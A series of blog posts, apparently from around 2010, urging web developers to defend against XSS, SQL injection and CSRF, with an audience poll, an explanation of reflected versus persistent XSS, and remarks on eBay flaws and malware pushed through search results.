Interesting (No) Show of Hands

Yesterday I spoke at CodeCamp 13 in Waltham, MA about web app security. Two talks, one for XSS and SQL Injection, the other for CSRF and discussion about the rest of the OWASP Top 10 list. During the first session I asked a set of questions to see first-hand whether what I had suspected was true. People were to raise their hand if the first question was a "yes" answer and leave it up until they answered "no" to a question.

Here is the set of questions, in order. Note the spot where you can't answer a question with a "Yes".

1. Do you build web sites/apps, web services, or windows apps that use a browser control?
   
   
2. Do you know what SQL Injection is?
3. Do you know how it works?
4. Do you actively code against SQL Injection attacks?
   
   
5. Do you know what XSS is?
6. Do you know how it works?
7. Do you actively code against XSS attacks?

Did you answer "yes" to all seven questions? I had 26 people in the talk and almost all raised their hand for the first question, which makes sense. After all seven questions, not a single hand was left up. There were 3 or 4 people who made it through six of the seven questions, but no one actively codes against those attacks.

THOSE ATTACKS ARE THE TOP TWO OUT IN THE WILD AND EXPECTED TO BE A RISK FOR 2010!

Think about this for a second. This was at a CodeCamp, where real developers go. There were hundreds of developers that didn't attend the event. There were 26 people in the room with me, so those are those most interested in security. There were dozens and dozens attending other sessions at the event at the same time, missing my talks by choice. So the most likely people to be good at protecting their sites are not actively protecting their sites against the top two attacks. Granted some gurus there likely didn't attend my talks since they already do all the work and didn't need them, but this is a clear statement to me about what is not happening in the development community.

Do I blame those folks that attended my session(s)? No way. They had great questions, were honestly concerned, and I know they left with a desire to turn things around. They were a great bunch for sure. But I hope it showed them, as it did me, that this is the norm. There is a lot of work left to be done to educate people on secure web app development. Hopefully the army is a little bigger after yesterday.

Reflected vs Persistent XSS

Most of us by now know what XSS is, how it works and how to stop it. But you may be hearing a bit more now about "reflected XSS" or "persistent XSS". What are they and how are they different, and most of all does it matter?

Reflected XSS

Reflected XSS is when the attacker sends along a link to a vulnerable page with a script in it and victims run the page as the attacker wants it set up. For example, think of search engine pages. If the attacker puts something in the search text so that search results are compromised, he/she can send you a link to that exact page. When you click on the link to that page YOU get the compromised search results and the attacker has you right where they want you...script running on your browser automatically.

Many times reflected XSS is used to grab your cookies so they can impersonate you, but obviously it can be for other things too.

Persistent XSS

This is where a site has malicious code on it, either on purpose or via user input. The victim may be going to a legitimate page with a malicious post (think discussion forum on legit site), or a malicious page whose intent is to attack you or others using your browser.

On thing malicious XSS sites are doing these days with persistent XSS is to infect your machine with malware. They accomplish this by telling you that you need to download a codec to view a file on their site. You accept the download and get the malware.

Thoughts

Something we can agree on is that we can all avoid going to malicious sites for the most part. We just stick to nice neighborhoods and avoid the skeevy ones. But malicious posts on trusted sites are hard to avoid. Consider StackOverflow.com. You go there to solve a tech problem and you hit a post with 15 replies. You get all 15 replies, like it or not. Those posts may have images that are pulled, etc. Before you go to the page, do you know if the page has a malicious script on it? You open the page and BOOM, everything runs...ain't a thing you can do about it either. (Don't worry, StackOverflow does not have this vulnerability, but do you know if other sites you hit are not vulnerable?)

Using something like the NoScript FireFox plugin is a smart thing. It blocks scripts until you allow them for a page or site. So the one bad post out of 15 will have its malicious script blocked unless you say it is ok to go to http://malicious_site.com and pull their script (in that case shame on you).

Final Thought

So now you know reflected and persistent XSS attacks. Do their differences matter? Maybe, but only from you being a USER so you know what to look for or watch out for. IM's, email links, links on pages, etc. Being a web dev, it doesn't matter at all. Stop allowing XSS on your sites, period. You block them the same way. Stop making excuses and get your site plugged, which stops all XSS attacks cold.

About eBay Vulnerabilities

So mid-February it was announced that eBay had some exploitable parts. Not cool! Guess what they involved? One had cross-site scripting (XSS) and another had SQL Injection. A third, that may still be unpatched, is a cross-site request forgery (CSRF) hole. Huh. Surprise surprise! These are the top holes, and have been railed about for years, literally. And here is another example of a big company with lots of developers with those old holes in place. Granted CSRF is tricky and sorta new, at least newly being exploited. But XSS and SQL Injection? Wow. The holes were in rather non-standard pages, but doesn't the mini basement window at the back of your house still get you in, where you can unlock the front door from the inside?

No more excuses! Patch those holes BEFORE you become a news headline! Oh, speaking of which: http://www.esecurityplanet.com/headlines/article.php/3866011/eBay-Vulnerabilities-Found.htm

Here is a good paper on what the top holes are and how to fix 'em: http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf. And in the coming weeks I'll give a full explanation of SQL Injection and CSRF to help you if you need it.

Why a Crippling Attack Against US Companies is Very Possible

Sure, some people are doomsayers and we look at them as fringe folks with a grain of truth expanded out to being an entire movement. I'm not being a doomsayer, but a realist, when I say that a concerted web attack on US companies is very possible.

First, in America we believe we are invincible and the smartest, most savvy people on the earth. We are prideful and boastful and believe we deserve every good thing, whether we work for it or not. I know that is a generalization but look around at the people in your neighborhood...I may not be describing YOU but look around you. In the "You serve me" mentality, people think security is someone else's thing, and that others will protect them. In companies, I've seen it where dollars outweigh quality and bad software gets shipped. If they are cutting corners on functionality, do you think they are even doing security on the pieces they create?

Second, we all know security is not "baked in" yet. It is something people add on top of the functionality that makes them money, if they get time. And right now times are tough financially...do you think companies are going to invest in baking security into the software lifecycle? While cutting jobs or shipping them overseas? While cutting corners and costs?

But the bad guys aren't taking time off to let us retool. What happened to Google and Intel and other companies lately is going to continue. Our image of everyone else in the world being less intelligent than us leads us to both our lack of diligence and to their anger against us. Do IT folks (and comical TV ads) bash Microsoft for just the same reasons of them being the arrogant big guy? Like it or not, people are putting our machines under their silent control and putting things in our hands to use against our own companies, government agencies, etc. Some of these botnets are for spam but it is clear now that no one is immune to flat out attack. A little social engineering and mom & pop machine takeover and you have a virtual army set to strike.

Recent stats say that 3-10% of all corporate PCs are compromised right now with malware that most likely puts them into a botnet. These are the places with good protections in place.

This blog started because I was floored at how many developers in big named companies were building sites with big security flaws. I assumed the little guys weren't doing security the best but to see some big companies not doing it floors me. As "invincible" Americans we learn many lessons the hard way and it is not going to do us, and the country we love, any good to learn this lesson that way.

If you are not learning about web security today, and making sure your sites don't allow for attack on/by them, then you are giving some really bad, money-driven people a foothold, a soldier. Enough footholds and you have an army.

My thinking is that many of the devs won't read this post at all even if presented with it, and if they do read it they will poo-poo it as someone else's concern or some doomsayer's rant. It is the way we are as humans and Americans, and we run a strong risk of falling hard simply by not doing the grunt work today.

Chilean Earthquake search results and your code

So after this morning's earthquake in Chile, it appears that the lovely new (and effective) fake anti-virus software is being propagated out through bad web sites that have cloaked themselves as being about the earthquake and had gotten themselves to the top of the search results on engines like Google. Unwary clickers would go to their site and voila, you've got a virus and they'd LOOOVE to fix it for you. Sigh. Sure, the bad sites will start going further down the list as the day wears on and real sites start getting back to the top based on volume and people linking to those articles.

"Whew!" you say, "Better that this isn't something that is on MY site! Man I could get in trouble for that!" Well, other than just plain old bad sites willingly hosting the fake anti-virus software, you have to be aware that there are other valid sites that the software is coming from (until it is noticed and removed). Is it one of yours?

If you have XSS allowed on your site, especially if you are hosting a forum or discussion group at all, you may have links right to that software ON YOUR SITE. You have to make sure you have XSS covered in all places. If I am a hacker, I'd set up the bad site for search results to have an IFRAME that points to your site which has another hidden IFRAME that grabs the software from a third server. You may be an unwitting contributor to today's malware distribution.

Lock it up and keep your sites out of the mix!